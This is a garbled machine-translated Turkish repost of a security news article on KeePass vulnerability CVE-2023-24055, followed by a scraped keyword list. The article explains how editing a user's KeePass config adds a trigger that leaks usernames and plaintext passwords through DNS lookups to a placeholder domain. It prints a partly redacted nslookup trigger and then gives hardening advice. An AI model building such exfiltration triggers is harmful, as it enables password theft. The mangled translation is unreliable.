Kullandığınız her web sitesi için farklı bir parola bulmanızı ve ardından hepsini takip etmenizi sağlayan kullanışlı araçlar olan parola yöneticileri için haber değeri taşıyan birkaç hafta oldu.
2022'nin sonunda, şirket Ağustos 2022'de yaşadığı bir ihlalin gerçekten de müşterilerin şifresiyle sonuçlandığını nihayet kabul ettiğinde, tüm haberlerde yer alma sırası LastPass'a gelmişti. kasalar çalınıyor yedeklendikleri bulut hizmetinden.
(Kasalar şifreli olduğu ve LastPass'ta yedek kasa dosyaları için kimsenin "ana anahtarının" kopyaları olmadığı için parolaların kendisi çalınmadı, ancak çoğu insanın duymaktan mutlu olacağından daha yakın bir tıraş oldu.)
Ardından, şirket bir döküntü gibi görünen şey hakkında uyarıda bulunduğunda, tüm haberlerde olma sırası LifeLock'a geldi. şifre tahmin saldırıları, muhtemelen tamamen farklı bir web sitesinden, muhtemelen bir süre önce çalınan ve belki de yakın zamanda karanlık ağdan satın alınan şifrelere dayanmaktadır.
LifeLock'un kendisi ihlal edilmemişti, ancak bazı kullanıcıları, aldıklarını bile hatırlamayabilecekleri risklerin neden olduğu parola paylaşım davranışları sayesinde ihlal etmişti.
Rakip firmalar 1Password ve BitWarden da, görünüşe göre Google tarafından farkında olmadan yayınlanan ve kullanıcıları ikna edici bir şekilde hesap ayrıntılarını ele geçirmeyi amaçlayan oturum açma sayfalarını kopyalamaya çeken kötü amaçlı reklam raporlarına dayanarak haberlerde yer aldı.
Şimdi olma sırası KeePass'ta haberlerde, bu kez başka bir siber güvenlik sorunu için: iddia edilen güvenlik açığı, saldırganların kötü amaçlarla yararlanabilecekleri siber güvenlik açıklarına yol açan yazılım hataları için kullanılan jargon terimi.
Parola koklama kolaylaştı
Biz buna bir güvenlik açığı burada çünkü ABD Ulusal Standartlar ve Teknoloji Enstitüsü tarafından yayınlanan resmi bir hata tanımlayıcısı var.
Hatanın adı verildi CVE-2023-24055: XML yapılandırma dosyasına yazma erişimi olan saldırgan, bir dışa aktarma tetikleyicisi ekleyerek şifresiz metin parolalarını elde edebilir.
Açık metin şifreleri elde edilebileceği iddiası ne yazık ki doğru.
Sözde dosyalarınız da dahil olmak üzere kişisel dosyalarınıza yazma erişimim varsa %APPDATA%
dizini, zaten özelleştirdiğiniz herhangi bir KeePass ayarını değiştirmek veya bilerek herhangi bir şeyi değiştirmediyseniz özelleştirmeler eklemek için yapılandırma bölümünü gizlice değiştirebilirim…
…ve düz metin parolalarınızı, örneğin tüm veritabanını şifrelenmemiş bir CSV dosyası olarak dökerek toplu olarak veya siz bunları kullandığınız sırada, örneğin bir programa her eriştiğinizde tetiklenen bir "program kancası" ayarlayarak şaşırtıcı bir şekilde kolayca çalabilirim. veritabanından şifre.
İhtiyacım olmadığına dikkat et yönetici ayrıcalıklar, çünkü KeePass uygulamasının depolandığı gerçek kurulum dizini ile uğraşmam gerekmiyor, bu genellikle normal kullanıcılar için yasak
Ve herhangi bir kilitli küresel yapılandırma ayarına erişmem gerekmiyor.
İlginç bir şekilde, KeePass, zaten sysadmin yetkilerine sahip kullanıcılardan bile çeşitli anti-keylogger hilelerini durdurmak için kurcalamaya karşı koruma teknikleri kullanmak da dahil olmak üzere, şifrelerinizi kullandığınızda şifrelerinizin çalınmasını durdurmak için elinden geleni yapıyor.
Ancak KeePass yazılımı, yönetici olmayanlar için bile "çok kolay" olduğunu düşündüğünüz şekillerde, düz metin parola verilerini yakalamayı şaşırtıcı derecede kolaylaştırır.
oluşturmak için KeePass GUI'yi kullanmak bir dakikalık işti. Tetik panoya her şifre kopyaladığınızda çalışacak olay ve bu olayı, söz konusu hem kullanıcı adını hem de düz metin şifresini içeren bir DNS araması yapacak şekilde ayarlamak için:
Daha sonra, bu seçenek için çok belirgin olmayan XML ayarını kendi yerel yapılandırma dosyamızdan sistemdeki başka bir kullanıcının yapılandırma dosyasına kopyalayabiliriz, ardından onlar da parolalarının DNS aramaları aracılığıyla internet üzerinden sızdırıldığını görürler.
XML yapılandırma verileri büyük ölçüde okunabilir ve bilgilendirici olsa da, KeePass ilginç bir şekilde GUID'ler (kısaca küresel benzersiz tanımlayıcılar) çeşitli belirtmek için Tetik Böylece bilgili bir kullanıcının bile hangi tetikleyicilerin nasıl ayarlandığını anlamak için kapsamlı bir referans listesine ihtiyacı olacaktır.
DNS sızdıran tetikleyicimiz şu şekilde görünüyor, ancak bu metni doğrudan kopyalayıp yapıştırarak hemen herhangi bir yaramazlık yapmamanız için bazı ayrıntıları yeniden düzenledik:
XXXXXXXXXXXXXXXXXXXXX kopyala DNS aramaları aracılığıyla bir şeyler çalın XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test Doğru 1
Bu tetik etkin durumdayken, bir KeePass parolasına erişmek, düz metnin göze batmayan bir DNS aramasında benim seçimim olan bir etki alanına sızmasına neden olur. blah.test
bu örnekte.
Gerçek hayattaki saldırganların çalınan metni neredeyse kesinlikle karıştıracağını veya gizleyeceğini unutmayın; bu, yalnızca DNS sızıntıları olduğunda fark edilmesini zorlaştırmakla kalmaz, aynı zamanda aksanlı harfler veya emojiler gibi ASCII dışı karakterler içeren parolaları da halleder. DNS adlarında başka şekilde kullanılamayacak olan:
Ama bu gerçekten bir böcek mi?
Ancak asıl zor soru şu: "Bu gerçekten bir hata mı, yoksa özel dosyalarınız üzerinde zaten en az sizin kadar kontrole ihtiyaç duyan biri tarafından kötüye kullanılabilecek güçlü bir özellik mi?"
Basitçe söylemek gerekirse, hesabınızı zaten kontrol eden birinin hesabınızın zaten erişebileceği varsayılan dosyalara müdahale etmesi bir güvenlik açığı mı?
Bir pssword yöneticisinin, bu tür hataların/özelliklerin suistimal edilmesini zorlaştırmak için çok fazla kurcalamaya karşı koruma katmanı içermesini umsanız da, CVE-2023-24055 gerçekten CVE listesindeki bir güvenlik açığı olabilir mi?
Eğer öyleyse, gibi komutlar olmaz DEL
(bir dosyayı silin) ve FORMAT
"böcek" olmak da mı gerekiyor?
Ve potansiyel olarak tehlikeli davranışları kışkırtmayı çok daha kolay hale getiren PowerShell'in varlığı olmaz mıydı (deneyin powerhsell get-clipboard
, örneğin), kendi başına bir güvenlik açığı olabilir mi?
Bu, KeePass'ın görüşüdür ve aşağıdaki metin tarafından onaylanmıştır. "hata" detayı NIST'in web sitesinde:
** İTİRAZ EDİLMİŞ ** […] NOT: satıcının görüşü, parola veritabanının yerel PC'ye bu düzeyde erişimi olan bir saldırgana karşı güvenli olması amaçlanmamıştır.
Ne yapalım?
Bağımsız bir KeePass kullanıcısıysanız, yukarıda oluşturduğumuz "DNS Stealer" gibi hileli Tetikleyicileri KeePass uygulamasını açıp Tools > Tetikleyiciler… pencere:
tamamını çevirebileceğinizi unutmayın. Tetik seçimini kaldırarak sistemi bu pencereden kapatın. [ ] Enable trigger system
seçenek…
…ancak bu genel bir ayar değildir, dolayısıyla yerel yapılandırma dosyanız aracılığıyla tekrar açılabilir ve bu nedenle, hesabınıza erişimi olan bir saldırgandan ziyade sizi yalnızca hatalardan korur.
Genel "kilitleme" dosyasını değiştirerek, bilgisayardaki herkes için seçeneği kapatmaya zorlayabilirsiniz, kendilerinin yeniden açma seçeneği yoktur. KeePass.config.enforced.XML
, uygulama programının yüklendiği dizinde bulunur.
Genel XML uygulama dosyanız şöyle görünüyorsa, tetikleyiciler herkes için zorunlu olarak kaldırılacaktır:
YANLIŞ
(Merak ediyorsanız, bu değişikliği tersine çevirmek için uygulama dizinine yazma erişimi olan bir saldırgan, KeePass yürütülebilir dosyasının kendisini değiştirmek veya yine de bağımsız bir keylogger yükleyip etkinleştirmek için sistem düzeyinde yeterli güce sahip olacaktır.)
Kullanıcılarınızın bilgisayarlarında KeePass'i onlara yardımcı olacak kadar esnek olacak şekilde kilitlemekle görevli bir ağ yöneticisiyseniz, ancak yanlışlıkla siber suçlulara yardım edecek kadar esnek değilseniz, KeePass'ı baştan sona okumanızı öneririz. Güvenlik Konuları sayfa, tetikleyiciler sayfa ve Zorunlu Yapılandırma gidin.
- SEO Destekli İçerik ve Halkla İlişkiler Dağıtımı. Bugün Gücünüzü Artırın.
- Plato blok zinciri. Web3 Metaverse Zekası. Bilgi Güçlendirildi. Buradan Erişin.
- Kaynak: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Yapabilmek
- Hakkımızda
- yukarıdaki
- kesin
- erişim
- erişme
- Hesap
- aktif
- katma
- kabul edilmiş
- İlanlarım
- Sonra
- karşı
- Türkiye
- iddia edilen
- zaten
- ve
- Başka
- uygulamayı yükleyeceğiz
- Uygulama
- Ağustos
- yazar
- Oto
- Arka
- arka çıkılmış
- background-image
- yedek
- merkezli
- Çünkü
- olmak
- sınır
- Alt
- ihlal
- Böcek
- böcek
- ele geçirmek
- hangi
- dava
- neden
- nedenleri
- Merkez
- kesinlikle
- değişiklik
- karakterler
- Kontrol
- seçim
- iddia
- yakın
- bulut
- renk
- nasıl
- şirket
- tamamen
- bilgisayar
- bilgisayarlar
- koşullar
- yapılandırma
- Düşünmek
- kontrol
- kopyalar
- olabilir
- kapak
- yaratmak
- çevrimiçi kurslar düzenliyorlar.
- özgeçmiş
- siber suçluların
- Siber güvenlik
- Tehlikeli
- karanlık
- koyu Web
- veri
- veritabanı
- ayrıntılar
- DID
- farklı
- direkt olarak
- ekran
- dns
- domain
- Dont
- aşağı
- dublajlı
- kolay
- kolayca
- ya
- şifreli
- uygulama
- yeterli
- Tüm
- Hatta
- Etkinlikler
- Her
- herkes
- örnek
- sömürmek
- ihracat
- kapsamlı, geniş
- ekstra
- Özellikler(Hazırlık aşamasında)
- az
- fileto
- dosyalar
- Nihayet
- bulmak
- esnek
- takip etme
- Zorla
- bulundu
- itibaren
- almak
- alma
- Küresel
- Goes
- kullanışlı
- mutlu
- sahip olan
- yükseklik
- yardım et
- okuyun
- Delikler
- umut
- duraksamak
- Ne kadar
- Ancak
- HTML
- HTTPS
- tanımlayıcı
- Acil
- in
- dahil
- dahil
- Dahil olmak üzere
- aydınlatıcı
- kurmak
- örnek
- Enstitü
- Internet
- konu
- Veriliş
- IT
- kendisi
- jargon
- tutmak
- bilinen
- çok
- LastPass
- katmanları
- öncülük etmek
- sızıntı
- Kaçaklar
- seviye
- Liste
- yerel
- baktı
- GÖRÜNÜYOR
- arama
- yapılmış
- yapmak
- YAPAR
- müdür
- Yöneticileri
- Kenar
- maksimum genişlik
- olabilir
- hata
- hataları
- değiştirmek
- çoğu
- isimleri
- ulusal
- gerek
- ağ
- haber
- NiST
- normal
- elde etmek
- resmi
- açma
- seçenek
- aksi takdirde
- kendi
- parametre
- Şifre
- şifreleri
- Paul
- PC
- İnsanlar
- belki
- kişisel
- Kimlik avı
- plaintext
- Platon
- Plato Veri Zekası
- PlatoVeri
- pozisyon
- Mesajlar
- potansiyel
- güç kelimesini seçerim
- güçlü
- güçler
- PowerShell
- özel
- ayrıcalıklar
- muhtemelen
- Programı
- satın alındı
- amaçlı
- koymak
- soru
- rasgele
- isilik
- Okuma
- geçenlerde
- tavsiye etmek
- düzenli
- hatırlamak
- cevap
- Bildirilen
- Raporlar
- ters
- riskler
- koşmak
- Bölüm
- güvenli
- duyu
- hizmet
- set
- ayar
- ayarlar
- kısa
- meli
- sadece
- So
- Yazılım
- katı
- biraz
- Birisi
- Spot
- bağımsız
- standartlar
- Yine
- çalıntı
- dur
- saklı
- böyle
- sözde
- SVG
- sistem
- Bizi daha iyi tanımak için
- teknikleri
- Teknoloji
- The
- ve bazı Asya
- kendilerini
- bu nedenle
- İçinden
- zaman
- için
- çok
- üst
- iz
- geçiş
- şeffaf
- tetikleyebilir
- gerçek
- DÖNÜŞ
- Dönük
- tipik
- benzersiz
- URL
- us
- kullanım
- kullanıcı
- kullanıcılar
- kamu hizmetleri
- çeşitli
- Tonoz
- tonozları
- üzerinden
- güvenlik açığı
- W3
- yolları
- ağ
- Web sitesi
- Haftalar
- Ne
- hangi
- DSÖ
- irade
- merak
- İş
- olur
- yazmak
- XML
- kendiniz
- zefirnet